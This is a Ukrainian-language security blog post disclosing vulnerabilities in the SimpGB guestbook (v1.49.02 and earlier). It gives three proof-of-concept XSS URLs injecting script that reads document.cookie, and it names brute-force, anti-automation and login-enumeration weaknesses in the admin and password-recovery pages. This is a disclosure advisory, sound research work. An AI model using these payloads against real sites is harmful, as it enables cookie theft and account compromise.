Численні уразливості в SimpGB

15:02 25.01.2011

17.11.2010

У липні, 15.07.2010, я знайшов Cross-Site Scripting, Brute Force, Insufficient Anti-automation та Abuse of Functionality уразливості в SimpGB. Дані уразливості я виявив на різних сайтах, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

25.01.2011

XSS:

POST запит на сторінці http://site/guestbook.php в параметрах poster, postingid та location в функції Preview. Якщо в гостьовій книзі використовується капча, то для атаки необхідний робочий код капчі. Або через GET запит:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force:

http://site/admin/index.php

Insufficient Anti-automation:

http://site/admin/pwlost.php

В даному функціоналі немає захисту від автоматизованих запитів.

Abuse of Functionality:

http://site/admin/pwlost.php

В даному функціоналі можна виявляти логіни.

Уразливі SimpGB v1.49.02 та попередні версії.


Leave a Reply

You must be logged in to post a comment.